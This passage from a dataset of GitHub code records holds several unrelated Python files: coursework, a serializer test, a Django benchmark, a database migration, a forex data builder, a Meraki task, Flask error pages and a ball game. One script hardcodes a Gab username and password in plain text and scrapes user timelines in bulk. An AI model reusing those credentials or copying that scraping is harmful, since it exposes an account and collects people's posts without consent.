disqualification (“Time”, “Swimming”, “Cycling” or “Running”, in this order).\n\"\"\" \n\ntS = float(input())\ntC = float(input())\ntR = float(input())\n\ntT = tS + tC + tR\n\nvS = 1.5 / tS\nvC = 40 / tC\nvR = 10 / tR\n\nif tT >= 4:\n print('Time')\nelif vS < 2:\n print('Swimming')\nelif vC < 20:\n print('Cycling')\nelif vR < 8:\n print('Running')\nelse:\n print(tT)\n\n\n\"\"\"\npublic:\n'0.4', '1.2', '0.4'\n'1', '1', '4'\n'0.5', '1', '2.2'\n'0.2', '1.8', '0.5'\npublic:\n'0.4', '1.3', '0.8'\n'1', '2', '0.9'\n'0.6', '3', '0.1'\n'0.5', '2', '1.4'\n\"\"\"\n","repo_name":"eukia/FEUP-FPRO","sub_path":"PE/PE01/triathlon.py","file_name":"triathlon.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35878078712","text":"import argparse\n\nfrom config import load_config\nfrom core.factory import Factory\nfrom core.serializers.jsonserializer import JSONSerializer\nfrom core.serializers.xmlserializer import XMLSerializer\nimport math\n\n\ndef my_decor(meth):\n def inner(*args, **kwargs):\n print('I am in my_decor')\n return meth(*args, **kwargs)\n\n return inner\n\n\nclass A:\n x = 10\n\n @my_decor\n def my_sin(self, c):\n return math.sin(c * self.x)\n\n @staticmethod\n def stat():\n return 145\n\n def __str__(self):\n return 'AAAAA'\n\n def __repr__(self):\n return 'AAAAA'\n\n\nclass B:\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n @property\n def prop(self):\n return self.a * self.b\n\n @classmethod\n def class_meth(cls):\n return math.pi\n\n\nclass C(A, B):\n pass\n\n\nser = Factory.create_serializer('json')\n\nvar = 15\nvar_ser = ser.dumps(var)\nvar_des = ser.loads(var_ser)\nprint(var_des)\n\nC_ser = ser.dumps(C)\nC_des = ser.loads(C_ser)\n\nc = C(1, 2)\nc_ser = ser.dumps(c)\nc_des = ser.loads(c_ser)\n\nprint(c_des)\nprint(c_des.x)\nprint(c_des.my_sin(10))\nprint(c_des.prop)\nprint(C_des.stat())\nprint(c_des.class_meth())\n\n\ndef f(a):\n for i in a:\n yield i\n\n\ng = f([1, 2, 3])\nprint(next(g))\ng_s = ser.dumps(g)\ng_d = ser.loads(g_s)\nprint(next(g_d))\n\n\ndef a(x):\n yield x[0]\n x[1] += 2\n yield\n\n\nfunc = lambda x: x*x\n\nser = Factory.create_serializer('json')\n\na = ser.dumps(func)\nb= ser.loads(a)\n\nprint(b(5))\n#\n# def main():\n# parser = argparse.ArgumentParser(description=\"Serializer Utility\")\n# parser.add_argument(\"--config\", help=\"Path to the configuration file\")\n# parser.add_argument(\"file_from\", help=\"Path to the input file\")\n# parser.add_argument(\"file_to\", help=\"Path to the output file\")\n# parser.add_argument(\"format_from\", help=\"Input format (json/xml)\")\n# parser.add_argument(\"format_to\", help=\"Output format (json/xml)\")\n#\n# args = parser.parse_args()\n#\n# if args.config:\n# file_from, file_to, format_from, format_to = load_config(args.config)\n# else:\n# file_from = args.file_from\n# file_to = args.file_to\n# format_from = args.format_from\n# format_to = args.format_to\n#\n# serializer = Factory.create_serializer(format_from)\n#\n# if format_to == \"json\":\n# if format_from == \"json\":\n# data = serializer.load(file_from)\n# serializer.dump(data, file_to)\n# elif format_from == \"xml\":\n# data = XMLSerializer.load(file_from)\n# JSONSerializer.dump(data, file_to)\n# elif format_to == \"xml\":\n# if format_from == \"json\":\n# data = JSONSerializer.load(file_from)\n# XMLSerializer.dump(data, file_to)\n# elif format_from == \"xml\":\n# data = serializer.load(file_from)\n# serializer.dump(data, file_to)\n#\n# print(\"Operation completed successfully.\")\n\n\n# if __name__ == '__main__':\n# main()\n","repo_name":"donshester/----","sub_path":"Lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12632645386","text":"import asyncio\nimport os\nimport timeit\n\nimport asgiref\nimport django\nfrom django.core.asgi import get_asgi_application\ntry:\n from django_websockets2.asgi_handler import \\\n get_asgi_application as get_fast_asgi_application\nexcept ImportError:\n get_fast_asgi_application = None\n\n\nREPEAT_COUNT = 10000\nFAST_ASGI = False\nASYNC_VIEW = True\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'app.settings')\n\n\nclass Context:\n status_code = None\n content = None\n\n async def send(self, data):\n if data['type'] == 'http.response.start':\n self.status_code = data['status']\n elif data['type'] == 'http.response.body':\n self.content = self.content or b'' + data['body']\n\n @staticmethod\n async def receive():\n return {\n 'type': '',\n 'body': b'ping'\n }\n\n\nclass Executor:\n def __init__(self):\n if FAST_ASGI:\n self.app = get_fast_asgi_application()\n else:\n self.app = get_asgi_application()\n\n def __call__(self):\n scope = {\n 'type': 'http',\n 'path': '/async/' if ASYNC_VIEW else '/sync/',\n 'method': 'GET',\n }\n response = Context()\n asyncio.run(self.app(scope, response.receive, response.send))\n if response.status_code != 200 or response.content != b'ping':\n raise Exception('Wrong response')\n\n\nexecutor = Executor()\n\nprint(django.VERSION)\nprint(asgiref.__file__)\nprint(timeit.timeit(executor, number=REPEAT_COUNT))\n","repo_name":"kozzztik/django_speedtest","sub_path":"test_asgi.py","file_name":"test_asgi.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11999115489","text":"\"\"\"Add user channel relationship table\n\nRevision ID: 6324cbc20fd0\nRevises: 0da2318334c3\nCreate Date: 2022-11-07 04:56:21.422811\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"6324cbc20fd0\"\ndown_revision = \"0da2318334c3\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, \"users\", [\"user_id\"])\n op.create_table(\n \"users_channels\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"channel_id\", sa.BigInteger(), nullable=False),\n sa.Column(\"user_id\", sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"channel_id\"],\n [\"channels.channel_id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"user_id\"],\n [\"users.user_id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"users\", type_=\"unique\")\n op.drop_table(\"users_channels\")\n # ### end Alembic commands ###\n","repo_name":"c2dc/telegram-bot","sub_path":"alembic/versions/6324cbc20fd0_add_user_channel_relationship_table.py","file_name":"6324cbc20fd0_add_user_channel_relationship_table.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"19606193390","text":"from deeprl_hw3 import imitation\nfrom keras.optimizers import Adam\nimport gym\n\nexpert = imitation.load_model('CartPole-v0_config.yaml',\n 'CartPole-v0_weights.h5f')\nenv = gym.make('CartPole-v0')\nhard_env = gym.make('CartPole-v0')\nhard_env = imitation.wrap_cartpole(hard_env)\n\n# imitation.generate_expert_training_data(expert, env)\n\n\n\nprint('Expert')\nimitation.test_cloned_policy(env, expert, render=False)\nimitation.test_cloned_policy(hard_env, expert, render=False)\nfor num_expert_episodes in [1,10,50,100]:\n# for num_expert_episodes in [1]:\n print('==================')\n print('Clone with ' + str(num_expert_episodes) + ' episode samples')\n s, a = imitation.generate_expert_training_data(expert, env,\n num_episodes=num_expert_episodes,\n render=False)\n clone = imitation.load_model('CartPole-v0_config.yaml')\n adam = Adam(lr=0.00025)\n clone.compile(adam, loss='binary_crossentropy', metrics=['accuracy'])\n hc = clone.fit(s,a, batch_size=32, epochs=50, verbose=0)\n\n print('Final Train Loss: ' + str(hc.history['loss'][-1]))\n print('Final Train Accuracy: ' + str(hc.history['acc'][-1])) \n imitation.test_cloned_policy(env, clone, render=False)\n imitation.test_cloned_policy(hard_env, clone, render=False) \n \n\n","repo_name":"rickgoldstein12/HW3","sub_path":"Q2/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17030685098","text":"###this is a test file by xuxw(xuxw76@yahoo.com)\n### it's all right\nimport Magnus\nw1=Magnus.Word()\nw2=Magnus.Word()\ng=Magnus.FPGroup()\nag=Magnus.AbelianGroup( g)\na=Magnus.AbelianInfinitenessProblem( g)\na.startComputation( )\nx=a.continueComputation( ) \nx=a.done( )\nx=a.isInfinite( ) \n","repo_name":"markuspf/magnus","sub_path":"branches/daly/version10/back_end/Group/swig/test/AbelianInfinitenessProblem.py","file_name":"AbelianInfinitenessProblem.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29805263760","text":"# build_feature_set.py\n\nimport os\nimport zipfile\nimport tempfile\nimport sys\nimport csv\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport math\nimport random\n\nexample_len = 4*4\nexample_step = 4*2\n\n# get_files_in_directory\ndef get_files_in_directory(directory, filter):\n for dir_name, _, files in os.walk(directory):\n for file in files:\n if filter in file:\n yield os.path.join(dir_name, file)\n# main\ndef main():\n\n if (len(sys.argv) < 2):\n print('ohlc files path / training set csv path missing')\n print('Quitting...')\n quit()\n\n ohlc_path = sys.argv[1]\n\n if (os.path.exists(ohlc_path) == False):\n print('path does not exist')\n quit()\n\n print(ohlc_path)\n\n ohlc_files = get_files_in_directory(ohlc_path, '.csv')\n output_file = sys.argv[2]\n\n training_set = []\n\n for ohlc_file in ohlc_files:\n #normalise\n #get training examples\n #train map\n\n print(ohlc_file)\n\n #read csv\n df = pd.read_csv(ohlc_file)\n dates = df[['open_time']]\n\n #normalise\n diff = df[['open_price', 'close_price', 'high_price', 'low_price']].diff(axis=0)\n norm = diff.divide(df[['open_price', 'close_price', 'high_price', 'low_price']])\n \n # flatten and drop the first four because they're NAN\n norm_flat = norm.values.flatten()[4:]\n\n size_len = len(norm_flat)\n num_examples = int(math.floor(size_len / example_len))\n\n for n in range(num_examples):\n i_offset = n * example_step\n i_offset_end = i_offset + example_len\n\n if (i_offset_end + 4) >= size_len:\n break \n\n #extract from i_offset tp i_offset_end and put into new aray\n sample = norm_flat[i_offset:i_offset_end]\n\n norm_min = sample.min()\n norm_max = sample.max()\n\n sample_norm = np.divide(sample - norm_min * np.ones(len(sample)), norm_max - norm_min)\n\n current_date_index = int(math.floor(i_offset / 4) + 1)\n next_close_price_index = i_offset_end + 4\n\n current_date = dates.loc[current_date_index]\n sample_strings = ['{:.10f}'.format(x) for x in sample_norm]\n \n # we want the normalised price but not scaled\n next_price = norm_flat[next_close_price_index]\n \n next_price_class = 0\n \n # classify the price change\n if next_price >= 0.0001:\n next_price_class = 1\n elif next_price <= -0.0001:\n next_price_class = 2\n\n write = [current_date.to_string(index=False)] + sample_strings + [str(next_price_class)] \n training_set.append(write)\n\n # write the training_set in random order to a csv\n with open(output_file, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL, lineterminator='\\n')\n\n # TODO write headers\n headers = ['time_stamp'] + [str(x) for x in range(1, example_len + 1)] + ['next_price']\n writer.writerow(headers) \n\n for index in random.sample(range(0, len(training_set)), len(training_set)):\n writer.writerow(training_set[index])\n \nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n main()","repo_name":"jul1278/ML-Forex-Forecasting","sub_path":"build_training_set.py","file_name":"build_training_set.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"37328368069","text":"from main.models import Organisation\nfrom main.models import Network\nfrom main.models import Device\nfrom main.models import Snapshot\nfrom main.models import UserProfile\nfrom django.core import serializers\nimport requests\nimport json\nimport math\nimport meraki\nimport datetime\nimport time\n\ndef get_coords(scanning_api_url,apikey,serial):\n \"\"\" gets coordinates of scanning api url\"\"\"\n if scanning_api_url in (\"\",None):\n return [\"Please set your scanning API URL in your profile\"]\n #creation of map comes here + business logic\n\n body = {\"key\":\"randominsert!!222_\"}\n resp = requests.post(scanning_api_url, body, {\"Content-Type\":\"application/json\"})\n found = False\n\n resp_json = resp.json()\n for outter in range(len(resp_json['body']['data']['observations'])):\n dist_list = []\n for inn in resp_json['body']['data']['observations']:\n long = resp_json['body']['data']['observations'][outter]['location']['lng']\n lat = resp_json['body']['data']['observations'][outter]['location']['lat']\n hav = haversine(long,lat,inn['location']['lng'],inn['location']['lat'])\n if hav < 2:\n text = \"\" + \"%.2f\" % hav\n found = True\n else:\n text = \"\" + \"%.2f\" % hav\n text+= ' - ' + inn['clientMac'] + ''\n dist_list.append(text)\n\n resp_json['body']['data']['observations'][outter]['distances'] = dist_list\n\n #if found:\n #Create snapshot if more than one person in camera zone (entire frame)\n #dash = meraki.DashboardAPI(apikey)\n\n #analytics_response = dash.camera.getDeviceCameraAnalyticsOverview(serial)\n\n #if analytics_response['entrances'] > 1: #More than one person in zone\n #url_response = dash.camera.generateDeviceCameraSnapshot(serial) #Pic\n #current_time = datetime.datetime.now()\n\n #all_users = UserProfile.objects.filter(apikey = apikey)\n\n #for user_profile in all_users:\n #new_snapshot = Snapshot.objects.create(\n #user = user_profile.user,\n #url = url_response['url'],\n #time = current_time.strftime(\"%c\")\n #)\n #new_snapshot.save()\n\n return resp_json['body']['data']['observations']\n\n\ndef haversine(lat1, lon1, lat2, lon2):\n \"\"\" An implementation of the haversine formula to\n caluclate distance between 2 points (long,lat) on earth)\"\"\"\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n arcsin = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2) ** 2\n\n result = 2 * math.asin(math.sqrt(arcsin))\n radius = 6371.1370 # Radius of earth km\n\n return result * radius * 1000\n\n\nwhile True:\n for user in list((UserProfile.objects.all())):\n for org in list((Organisation.objects.filter(apikey=user.apikey))):\n print(org.apikey)\n for net in (Network.objects.filter(org=org)):\n \n if(net.scanningAPIURL != None):\n #get_coords(network.scanningAPIURL)\n for device in list((Device.objects.filter(net=net))):\n if (device.devModel == 'MV12N'):\n get_coords(net.scanningAPIURL,user.apikey,device.devSerial) \n time.sleep(60)","repo_name":"Horse-Lips/Cisco_Meraki_COVID_Tracker","sub_path":"cisco_dashboard/main/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"335953303","text":"from api import Gab\nimport json\n\ngab = Gab('dheerajpreddy', 'Test@123')\n\nwith open('username.json', 'r') as fp:\n people = json.load(fp)\nfp.close()\n\ntotal = 50000\ncount = 0\nhaha = 0\n\nwith open('newgabs.json', 'w') as f:\n\tjson.dump([], f)\nf.close()\n\nfor user in people:\n\tprint (haha)\n\tprint (count)\n\tprint ('\\n')\n\tif count >= total:\n\t\tbreak\n\thaha += 1\n\tprint (user)\n\ttry:\n\t\twith open('newgabs.json', 'r') as fp:\n\t\t\tdata = json.load(fp)\n\t\tfp.close()\n\t\tusername = user['username']\n\t\tgabs = gab.getusertimeline(username, 100)\n\t\tcount += len(gabs)\n\t\tdata += gabs\n\t\twith open('newgabs.json', 'w') as f:\n\t\t\tjson.dump(data, f)\n\t\tf.close()\n\texcept:\n\t\tcontinue\n","repo_name":"dheerajpreddy/GAB-Analysis","sub_path":"src/collect_gabs.py","file_name":"collect_gabs.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4565378503","text":"#!/usr/bin/python3\n\"\"\"\nErrors modules\nCustom templates for error handling\n\"\"\"\n\nfrom flask import render_template, url_for, request\nfrom flask_login import current_user\nfrom models import storage, Recruiter\nfrom web_static.handlers import bp\n\n\n@bp.app_errorhandler(404)\ndef not_found_error(error):\n url = request.path\n print(\"404 error handler called for this url: {}\".format(url))\n is_recruiter = False\n if current_user.is_authenticated:\n user = storage.get_by_id(current_user.id)\n if isinstance(user, Recruiter):\n is_recruiter = True\n return render_template('404.html', is_recruiter=is_recruiter)\n # url = url_for('views.home')\n # print(\"url_for('home') is : {}\".format(url))\n return render_template('404.html', is_recruiter=is_recruiter), 404\n\n\n@bp.app_errorhandler(403)\ndef not_found_error(error):\n print(\"403 error handler called\")\n is_recruiter = False\n if current_user.is_authenticated:\n user = storage.get_by_id(current_user.id)\n if isinstance(user, Recruiter):\n is_recruiter = True\n return render_template('403.html', is_recruiter=is_recruiter)\n return render_template('403.html', is_recruiter=is_recruiter), 403\n\n\n@bp.app_errorhandler(500)\ndef internal_error(error):\n print(\"500 error handler called\")\n storage.roll_back()\n is_recruiter = False\n if current_user.is_authenticated:\n user = storage.get_by_id(current_user.id)\n if isinstance(user, Recruiter):\n is_recruiter = True\n return render_template('500.html', is_recruiter=is_recruiter)\n return render_template('500.html', is_recruiter=is_recruiter), 500\n","repo_name":"Sumshi/Portfolio-CareerLink","sub_path":"web_static/handlers/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"69940490485","text":"class DataModel:\n def __init__(self):\n self.QRcodeContent = None\n self.dateTimeStamp = None\n self.startTimeStamp = None\n self.endTimeStamp = 0\n self.isDriving = False\n self.state = HerbEstates[\"initial\"]\n self.distanceDriven = 0\n self.plantImage = None\n self.recognisedPlantsList1 = None\n self.recognisedPlantsListx = None\n self.amountOfPlantxScanned = 1\n self.plant1Type = \"noch undefiniert\"\n self.commonName = \"\"\n self.plantMatchPosition = \"noch undefiniert\"\n self.isFinished = False\n self.imageURL = \"\"\n \n def toJSON(self, restAPIKey):\n return {\n \"id\": 1,\n \"dateTimeStamp\": self.dateTimeStamp,\n \"startTimeStamp\": self.startTimeStamp,\n \"endTimeStamp\": self.endTimeStamp,\n \"distance\": self.distanceDriven,\n \"state\": self.state,\n \"plantType\": self.plant1Type,\n \"commonName\": self.commonName,\n \"plantMatchPosition\": self.plantMatchPosition,\n \"isFinished\": self.isFinished,\n \"imageURL\": self.imageURL,\n \"apiKey\": restAPIKey\n }\n \n def resetModel(self):\n self.QRcodeContent = None\n self.dateTimeStamp = None\n self.startTimeStamp = None\n self.endTimeStamp = 0\n self.isDriving = False\n self.state = HerbEstates[\"initial\"]\n self.distanceDriven = 0\n self.plantImage = None\n self.recognisedPlantsList1 = None\n self.recognisedPlantsListx = None\n self.amountOfPlantxScanned = 1\n self.plant1Type = \"noch undefiniert\"\n self.commonName = \"\"\n self.plantMatchPosition = \"noch undefiniert\"\n self.isFinished = False\n self.imageURL = \"\"\n\n# HerbE states\nHerbEstates = {\n \"initial\": \"Herb-E ist bereit für die Fahrt. Start-Knopf drücken um zu beginnen.\",\n \"driving\": \"Herb-E ist am fahren. Der Ultraschallsensor sucht nach Objekten und die Kamera nach QR-Codes.\",\n \"ultraDetected\": \"Herb-E hat mit dem Ultraschallsensor ein Objekt erkannt und sucht jetzt nach QR-Codes.\",\n \"qrDetected\": \"Herb-E hat ein QR-Code erkannt, schiesst ein Foto und sucht nach der Pflanzenart.\",\n \"stop\": \"Herb-E hat angehalten.\",\n \"stopButtonPressed\": \"Der Stop-Button wurde gedrückt. Herb-E ist bereit für einen erneuten Start.\",\n \"goal\": \"Herb-E hat seine Arbeit erledigt und das Ziel erreicht!!!\"\n}","repo_name":"dave1b/PREN_HerbE","sub_path":"Main_Model/DataModel.py","file_name":"DataModel.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13539629995","text":"# https://leetcode.com/problems/minimum-area-rectangle/\n\nfrom typing import List\n\nclass Solution:\n \n # Runtime: 2857 ms, faster than 5.03% of Python3 online submissions for Minimum Area Rectangle.\n # Memory Usage: 14 MB, less than 99.83% of Python3 online submissions for Minimum Area Rectangle.\n \n def minAreaRect(self, points: List[List[int]]) -> int:\n \n hashset = set(map(tuple, points))\n \n area = float(\"inf\")\n for point1 in hashset:\n for point2 in hashset:\n \n x1, y1 = point1\n x2, y2 = point2\n \n if x1 < x2 and y1 < y2 and (x1, y2) in hashset and (x2, y1) in hashset:\n area = min(area, (x2-x1) * (y2 -y1))\n \n return area != float(\"inf\") and area or 0","repo_name":"Jiganesh/Loads-Of-Logic","sub_path":"hashTable/minimumAreaRectangle.py","file_name":"minimumAreaRectangle.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"76"} +{"seq_id":"9272152268","text":"\nfrom math import floor\nfrom Entities.ball import Ball\nfrom Entities.enemy import Enemy\nfrom Entities.player import Player\nfrom Game_Control.Vector import Vector\nimport SimpleGUICS2Pygame.simpleguics2pygame as simplegui\nfrom Entities.power_ups import Power_Up\nfrom Entities.mass import Mass\nimport random\nfrom Game_Control.keyboard import Keyboard\n\nfrom Maps.line import Line\n\nclass Interaction:\n \"\"\"Handles the interactions between game objects. \n \"\"\"\n def __init__(self, lines: list[Line], player: Player, enemy: list[Enemy], time: int, keyboard: Keyboard, frame:simplegui.Frame) -> None:\n \"\"\"Initializes interaction object to handle interactions between game objects.\n \n Args:\n `lines (Line)`: walls of the game where balls bounce.\n `player (Ball)`: player of the game.\n `enemy (Ball)`: enemy that move around the map (enemies).\n `time (int)`: time limit for the game.\n `keyboard (Keyboard)`: handles keyboard input to make the player move.\n `frame (Frame)`: interactive window where game play takes place.\n \"\"\"\n #^ Entities:\n self.enemy: Enemy = enemy\n self.player: Player = player\n self.power_ups: list[Power_Up] = []\n self.mass: list[Mass] = []\n self.lines: Line = lines\n\n #^ Environment:\n self.keyboard: Keyboard = keyboard \n self.kill_counter: int = 0\n self.frame = frame\n \n #^ Timers:\n self.time_limit: int = time # The limit for which the game will run \n self.time_count = simplegui.create_timer(1000, self.countdown) # Counts how many times method is called. Used for computing one second. \n self.time_count.start()\n self.player_power_up_timer = simplegui.create_timer(10_000, self.reset_player_power_up) # How long the power up will last\n self.power_up_timer_create = simplegui.create_timer(15_000, self.add_power_up) # Create a power up object every set time\n self.power_up_timer_create.start()\n self.enemy_split_timer = simplegui.create_timer(30_000, self.enemy_split) # Split the enemy every minute\n self.enemy_split_timer.start()\n\n #^ Draw: \n def draw(self, canvas) -> None:\n \"\"\"Draws each element in list of objects. \n Method calls other draw methods for the specific objects. \n \n Args:\n `canvas (Canvas)`: where the gameplay takes place. \n \n Calls:\n `self.update()`: used to update the state and position of the balls. \n `self.draw_player(canvas)`: draws the player in the canvas\n `self.draw_enemy(canvas)`: draws the enemies in the canvas\n `self.draw_mass(canvas)`: draws the mass in the canvas\n `self.draw_power_ups(canvas)`: draw the powerups in the canvas\n `self.draw_map(canvas)`: draws game map in the canvas\n `self.draw_store(canvas)`: draws player scores in the canvas\n \"\"\"\n self.update() # Update method called to update the ball objects\n self.draw_player(canvas)\n self.draw_enemy(canvas)\n self.draw_mass(canvas)\n self.draw_power_ups(canvas)\n self.draw_map(canvas)\n self.draw_score(canvas)\n \n def draw_player(self, canvas) -> None:\n \"\"\"Draws the player in the canvas.\n The player is drawn only if the it is alive. \n If the player is not alive, then the it will not be drawn. \n An if statement is used to check whether the player is alive. \n \n Args:\n `canvas (Canvas)`: where the game play takes place.\n\n Calls:\n `Player.draw(canvas)`: calls the draw method from Player object to draw player object. \n \"\"\"\n if (self.player.alive): # Check whether player object drawn if alive\n self.player.draw(canvas)\n\n def draw_enemy(self, canvas) -> None:\n \"\"\"Draws the enemies. \n There are multiple enemy objects stored in the list. \n A for loop is used to iterate over each enemy in the list. \n For each enemy, the draw method of the current enemy object is called. \n\n Args:\n `canvas (Canvas)`: where the game play takes place\n\n Calls:\n `Enemy.draw(canvas)`: calls the draw method from Enemy object to draw player object.\n \"\"\"\n for enemy in self.enemy: # For each ball stored in the ball list\n enemy.draw(canvas) # Draw the current ball\n\n def draw_mass(self, canvas) -> None:\n \"\"\"Draws the enemies. \n There are multiple mass objects stored in the list. \n A for loop is used to iterate over each mass in the list. \n For each mass, the draw method of the current mass object is called. \n\n Args:\n `canvas(Canvas)`: where the game play takes place. \n\n Calls:\n `Mass.draw(canvas)`: calls the draw method from Mass object to draw mass object.\n \"\"\"\n for mass in self.mass: # Iterates over each mass in the list\n mass.draw(canvas)\n\n def draw_power_ups(self, canvas) -> None:\n \"\"\"Draws the power ups.\n There are multiple power ups objects stored in the list. \n A for loop is used to iterate over each power up in the list. \n For each power up, the draw method of the current power up object is called. \n\n Args:\n `canvas (Canvas)`: where the game play takes place. \n\n Calls:\n `Power_Up.draw(canvas)`: calls the draw method from Power_Up object to draw power up object.\n \"\"\"\n for power_up in self.power_ups:\n power_up.draw(canvas) \n\n def draw_map(self, canvas) -> None:\n \"\"\"Draws the walls around the canvas. \n The walls (thick lines) are used to as boundaries for ball objects. \n The ball objects bounce upon collision with the wall. \n There are multiple walls which are stored in the list. \n A for loop is used to iterate over the walls stored in the list. \n For each wall object, the draw method of the wall is called. \n\n Args:\n `canvas (Canvas)`: where the game play takes place. \n\n Calls:\n `Line.draw(canvas)`: calls the draw method from Line object to draw line object.\n \"\"\"\n for line in self.lines: # For each line stored in the line list\n line.draw(canvas) # Draw the current line \n\n def draw_score(self, canvas) -> None:\n \"\"\"Draws score as text. \n Draws the number of enemies killed (engulfed) by the player. \n Draws the size of the player by using the radius of the player. \n Draws the time remaining. \n Draws the type of the power up currently being used. \n\n If the time limit is unlimited or greater than 10, then the text will be green indicating that there is plenty of time. \n If the time is less than 10, then the text will be red indicating that the time is running out. \n\n These are all drawn in on line along the top wall. \n\n Args:\n `canvas (Canvas)`: where the game play takes place. \n \"\"\"\n #^ Checks Time Limit:\n if (self.time_limit < 0): # Decrementing from 0 means that the time limit is never reached\n remaining_time = \"Unlimited\"\n else: # If there is a time limit then it is displayed\n remaining_time = self.time_limit\n\n #^ Checks Remaining Time: \n if (self.time_limit > 10 or self.time_limit < 0): # If the time remaining is unlimited or more than 10 seconds\n colour: str = \"green\"\n else:\n colour: str = \"red\" # If the time remaining is 0 to 9 seconds\n \n canvas.draw_text(f'Kills: {self.kill_counter} Size: {round(self.player.radius, 1)} Time: {remaining_time} Power Up: {self.player.power_up}', (20, 13), 18, colour)\n \n #^ Update:\n def update(self) -> None:\n \"\"\"Updates balls in the list. \n This method handles updating the enemies stored in the enemy list, the single player, the mass stored in a list, and the power ups stored in a list. \n Each ball (player, enemy and mass) stored is an object. \n Enemies, players, mass, and power ups are updated by calling their respective update methods. \n \n Function to check if game is over is called for checking.\n This function checks whether the game is over and executes the appropriate actions. \n\n Calls:\n `self.update_player()`: handles updating position and state of the player. \n `self.update_enemy()`: handles updating position and state of the enemy.\n `self.update_mass()`: handles updating position and state of the mass. \n `self.update_power_ups()`: handles checking collision with player object. \n `self.game_finish()`: checks whether the game is over (if player has lost or won). \n \"\"\"\n self.update_player() \n self.update_enemy()\n self.update_mass()\n self.update_power_ups()\n self.game_finish()\n\n def update_player(self) -> None:\n \"\"\"Update the player. \n Method handles updating the position of the player and bouncing upon collision with walls. \n To update the position of the player, the update method of the player object itself is called. \n \n Keyboard controls are used to control the player. \n When a key is pressed, the appropriate velocity according to the direction is incremented. \n This is handled by the `player_control()` method. \n\n Since the player loses mass to change direction manually, \n `Player.can_move()` is called to check if there is enough mass to move. \n\n There is a single player which is updated normally. \n\n Calls:\n `Player.update()`: handles updating the position of the player object. \n `Player.can_move()`: checks whether there is enough mass to move. \n `self.bounce()`: handles the updating the velocity of the player upon collision with wall. \n `self.player_control()`: moves the player using keypresses by updating the position. \n \"\"\"\n self.player.update()\n self.bounce(self.player) \n self.player_controls()\n self.player.can_move()\n\n def player_controls(self) -> None:\n \"\"\"Moves the player according the key being pressed. \n Depending the key being pressed, the velocity is incremented on the specific axes. \n There is a limit for how fast the player can travel. \n \n Once this speed limit is reached, the statement is not executed. \n This means that the speed will not longer be increased as velocity will not be incremented and \n mass will not be ejected. \n\n Additionally, if the player runs out of mass, then it cannot change velocity. \n The method checks whether the player can move using an if statement. \n\n When the player object receives a power up, the speed limit is increases. \n\n Calls: \n `self.eject_mass()`: ejects the mass from player when position is updated manually.\n \"\"\"\n velocity_limit = 5\n\n #^ Check Power Ups:\n if (self.player.power_up == \"Speed\"): # Specify the power up received\n velocity_limit: int = 10\n\n #^ Keyboard Controls:\n if (self.keyboard.right) and (self.player.velocity.get_p()[0] < velocity_limit) and (self.player.move): #* Right\n self.player.velocity.add(Vector(1, 0))\n self.eject_mass()\n if (self.keyboard.left) and (self.player.velocity.get_p()[0] > -velocity_limit) and (self.player.move): #* Left\n self.player.velocity.add(Vector(-1, 0))\n self.eject_mass()\n if (self.keyboard.up) and (self.player.velocity.get_p()[1] > -velocity_limit) and (self.player.move): #* Up\n self.player.velocity.add(Vector(0, -1))\n self.eject_mass()\n if (self.keyboard.down) and (self.player.velocity.get_p()[1] < velocity_limit) and (self.player.move): #* Down \n self.player.velocity.add(Vector(0, 1))\n self.eject_mass()\n\n def eject_mass(self) -> None: \n \"\"\"Each time the player manually moves mass is created. \n Mass will move in the opposite direction to emulate Newton's Laws. \n\n The mass is spawned on the opposite side of the direction of the player object. \n The formula 